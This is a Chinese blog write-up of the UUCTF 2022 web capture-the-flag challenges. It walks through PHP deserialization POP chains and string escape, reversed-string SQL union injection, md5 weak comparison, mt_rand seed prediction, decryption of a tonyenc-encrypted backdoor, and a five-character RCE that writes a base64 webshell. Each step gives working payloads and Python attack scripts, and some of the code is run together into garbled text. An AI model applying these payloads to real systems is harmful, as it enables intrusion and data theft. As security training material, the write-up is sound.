目录
(6) funmd5(代码审计 %0a绕过preg_replace)
(9) backdoor(tonyenc加密&IDA逆向so文件)
(11) uploadandinject(LD_PRELOAD劫持)
<1> Web
(1) websign(禁用js绕过)
禁用了右键与ctrl U 我们提前打开F12 然后再访问,即可看见源码
(2) ez_rce(?>闭合 `rce`)
'; eval($code); } else{ die("你想干什么?????????"); }}else{ echo "居然都不输入参数,可恶!!!!!!!!!"; show_source(__FILE__);}没有过滤 <> ? \/ 可以 ?>闭合
?code=?> 得到flag文件名称:fffffffffflagafag
rev和nl没有被过滤 利用此读取flag文件
?code=?>
(3) ez_unser(引用传递)
a=1; $this->b=2; $this->c=3; } public function __wakeup(){ $this->a=''; } public function __destruct(){ $this->b=$this->c; eval($this->a); }}$a=$_GET['a'];if(!preg_match('/test":3/i',$a)){ die("你输入的不正确!!!搞什么!!");}$bbb=unserialize($_GET['a']);反序列化,从正则上看 preg_match('/test":3/i',$a) 即我们传入的序列化数据不能通过修改属性个数来绕过wakeup
这道题和之前ISCTF比赛的 猫和老鼠 类似,可以用引用地址传递
exp:
a = &$A->b;$A->c = "system('cat /fffffffffflagafag');";echo serialize($A);?>(4) ez_upload(apache后缀解析漏洞)
(5) ezsql(union注入)
简单union注入,不过是把字符串反向了 过滤了or
union注入:
?user=admin&password=%232%2C1+tceles+noinu+)'1
即:SELECT * FROM users WHERE passwd=('1') union select 1,2#') AND username=('nimda') LIMIT 0,1 得知有两列, 回显为1和2
过滤了 or,所以原先是ro的词,双写绕过 rroo
?user=admin&password=%23)(esabatad%3Damehcs_elbat+erehw+selbat.amehcs_noitamrofni+moorrf+)eman_elbat(tacnoc_puoorrg%2C1+tceles+noinu+)'1
即:SELECT * FROM users WHERE passwd=('1') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#') AND username=('nimda') LIMIT 0,1
得到flag表
查询flag表字段
?user=admin&password=%23'galf'%3Deman_elbat+dna+)(esabatad%3Damehcs_elbat+erehw+snmuloc.amehcs_noitamrofni+moorrf+)eman_nmuloc(tacnoc_puoorrg%2C1+tceles+noinu+)'1
即:SELECT * FROM users WHERE passwd=('1') union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'#') AND username=('nimda') LIMIT 0,1
得到UUCTF
?user=admin&password=%23galf+moorrf+FTCUU%2C1+tceles+noinu+)'1
即:SELECT * FROM users WHERE passwd=('1') union select 1,UUCTF from flag#') AND username=('nimda') LIMIT 0,1
得到flag
(6) funmd5(代码审计 %0a绕过preg_replace)
"; echo $flag; } else{ echo $md5[0]; echo "oh!no!maybe you need learn more PHP!"; } } else{ echo "this is your md5:$md5[0]
"; echo "maybe you need more think think!"; }}else{ highlight_file(__FILE__); $sub=strlen($md5[0]); echo substr($guessmd5,0,5)."
"; echo "plase give me the md5!";}?>8b17e$md5=preg_replace('/^(.)0e(.)$/','${1}no_science_notation!${2}',$md5); if(preg_match('/0e/',$md5[0]))
这两个里的条件是矛盾的,但是我们可以%0a绕过preg_replace函数,同时传入的md5[0]要满足
$md5[0]==md5($md5[0] 很常见的md5考点,弱类型比较 0e215962017 MD5加密后还是0e开头。
因此md5[0]应该传入%0a0e215962017,但是我们又多了一个%0a 换行符,通过上面这行代码 $md5[0]=substr($md5[0],$sub);
可以在 $sub=1的时候,执行会达到删去%0a的作用
而 $sub=substr($time,-1); $sub由$time决定,$sub为$time的最后一位。
要得到flag,要满足的第二个条件为:$md5[1]===$guessmd5 手动比较慢,赶不上时间,因此需要写一个python脚本
如下:
import requestsimport timeimport hashlibs = requests.session()while True: url = "http://43.143.7.127:28150/?md5[0]=%0a0e215962017&md5[1]={}".format(hashlib.md5(str(int(time.time())).encode('utf-8')).hexdigest()) res = s.get(url=url).text print(res) if 'well' in res: print(res) break time.sleep(0.5)(7) phonecode(伪随机数漏洞)
结合这句话,可以联想到mt_rand()和mt_srand() 随机数种子,发包 得到hint,
phone不同,hint不同
猜测phone为种子,hint为其中的伪随机数序列
phone为1时,hint:895547922 印证了刚才的想法
"; #895547922echo mt_rand()."
"; #2141438069echo mt_rand()."
"; #1546885062echo mt_rand()."
"; #2002651684?>我们传入code为下一个随机数试一试 得到flag
(8) ezpop(反序列化字符串逃逸)
name=$str; } function __wakeup(){ if($this->key==="UUCTF"){ $this->ob=unserialize(base64_decode($this->basedata)); } else{ die("oh!you should learn PHP unserialize String escape!"); } }}class output{ public $a; function __toString(){ $this->a->rce(); }}class nothing{ public $a; public $b; public $t; function __wakeup(){ $this->a=""; } function __destruct(){ $this->b=$this->t; die($this->a); }}class youwant{ public $cmd; function rce(){ eval($this->cmd); }}$pdata=$_POST["data"];if(isset($pdata)){ $data=serialize(new UUCTF($pdata)); $data_replace=str_replace("hacker","loveuu!",$data); unserialize($data_replace);}else{ highlight_file(__FILE__);}?>data参数可控,然后post会传入data之后,$data会new一个UUCTF类的实例对象,替换掉hacker为loveuu!,再进行反序列化
先正常传入data=jack,则$data应该为:
O:5:"UUCTF":4:{s:4:"name";s:4:"jack";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}
其中标红的是我们可控的参数
开始代码审计,在youwant类我们可以通过rce方法,实现命令执行,以此读flag,
现在找链子:
UUCTF:: nothing::__destruct() -> output::__toString() -> youwant::rce
流程即:我们通过传入的data参数,构造把后面的逃逸掉,构造新的序列化串
O:5:"UUCTF":4:{s:4:"name";s:4:"构造的";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}
unserialize($data_replace); 这一段代码是为了触发 UUCTF的__wakeup(),我们需要真正利用的是 __wakeup()函数里,满足 $this->key==="UUCTF"条件后,执行的unserialize(base64_decode($this->basedata));
exp如下:
a=""; } function __destruct(){ $this->b=$this->t; die($this->a); }}class youwant{ public $cmd="system('cat flag.php');";}$A = new nothing();$A->a = &$A->b;$A->t = new output();$A->t->a = new youwant();$basedata = base64_encode(serialize($A));$data = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';$hacker='';for($i=0;$i得到:Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19
所以构造的序列化串应为:
O:5:"UUCTF":4:{s:4:"name";s:4:"";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:176:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19";s:2:"ob";N;}";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}
但是我们要满足前面的s:*:"构造的" 长度*为我们构造的串的长度,一个hacker换为loveuu! 可以逃逸出一个字符,红色串总长为 236,因此需要236个hacker
最终查看源码,得到flag
详细有关反序列化逃逸可以参考我前面的文章:buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)_葫芦娃42的博客-CSDN博客_apache ssi 远程命令执行 过滤绕过
(9) backdoor(tonyenc加密&IDA逆向so文件)
布里茨贼猛 lol里机器人叫布里茨,联想到robots.txt
看见www.zip,存在备份文件泄露 下载下来 backdoor.php 结合文件名称,应该是被加密的后门
还有一个so.so文件 看其他师傅wp,此题需要逆向的知识
2022UUCTF-web_yb0os1的博客-CSDN博客_uuctf 2022
IDA 逆向 .so文件
so文件是Linux下向当于Windows下的dll文件,Linux下的程序函数库,即编译好的可以供其他程序使用的代码和数据
发现了 tonyenc_encode加密代码
双击代码里的tonyenc_key 得到 header和key的十六进制数据
百度搜索后得知
tonyenc 是一个简洁、高性能、跨平台的 PHP7 代码加密扩展,可以加密php文件内容,PHP 在运行它们时会自动解密
贴上yb0os1师傅根据源码写的解密脚本:
import base64header=[ 0x66, 0x88, 0xff, 0x4f, 0x68, 0x86, 0x00, 0x56, 0x11, 0x61, 0x16, 0x18,]key=[ 0x9f, 0x58, 0x54, 0x00, 0x58, 0x9f, 0xff, 0x23, 0x8e, 0xfe, 0xea, 0xfa, 0xa6, 0x35, 0xf3, 0xc6]def decode(data,len): p =0 for i in range(0,len): if (i & 1): p += key[p] + i; p %= 16; t = key[p]; data[i] = ~data[i]^t; if data[i] < 0: data[i]=data[i]+256 decode = "".join([chr(c) for c in data]) return decodeencodefile=open('backdoor.php',"rb")base64_encodestr=base64.b64encode(encodefile.read())convert=[c for c in base64.b64decode(base64_encodestr)]del convert[0:len(header)]print(str(decode(convert,len(convert))))解密得到backdoor.php文件内容为
(10) ezrce(限制 6字符RCE)
题目描述:这是一个命令执行接口
方法1
>nl
执行后,会创建名为 nl 的文件
* /*>d意思就是 nl /*>f 第一个*就是将ls列出文件名第一个当作命令 其他当作参数 即 nl /*>d
方法二
>a 在Linux会创建一个叫a的文件
*>v 会将ls列出的第一个文件名当作命令 其余当作参数执行
*v>0 等价于 rev v >0 反转
sh 0 将0文件的内容当作命令执行
ls -th 按照文件的创建时间(后创建先列出)ls -t就可以 这里加上h是为了按照 sl ht- f\>排列
linux下换行执行命令:
ech\
o\
111
贴上yb0os1师傅的脚本: tql
url="http://43.142.108.3:28933/post.php"print("[+]start attack!!!")with open("5字符RCE.txt", "r") as f: for i in f: data = {"cmd": f"{i.strip()}"} requests.post(url=url,data=data)resp = requests.get("http://43.142.108.3:28933/tmp/1.php")if resp.status_code == requests.codes.ok: print("[*]Attack success!!!") 5字符RCE.txt>dir>sl>ht->f\>*>v>rev*v>0>hp>1.p\\>d\>\\>\ -\\>e64\\>bas\\>7\|\\>XSk\\>Fsx\\>dFV\\>kX0\\>bCg\\>XZh\\>AgZ\\>waH\\>PD9\\>o\ \\>ech\\sh 0sh f(11) uploadandinject(LD_PRELOAD劫持)
下面准备开一章 LD_PRELOAD,仔细研究一下,这道题就写下一篇里吧
参考:2022UUCTF-web_yb0os1的博客-CSDN博客_uuctf 2022
来源地址:https://blog.csdn.net/weixin_63231007/article/details/128046320
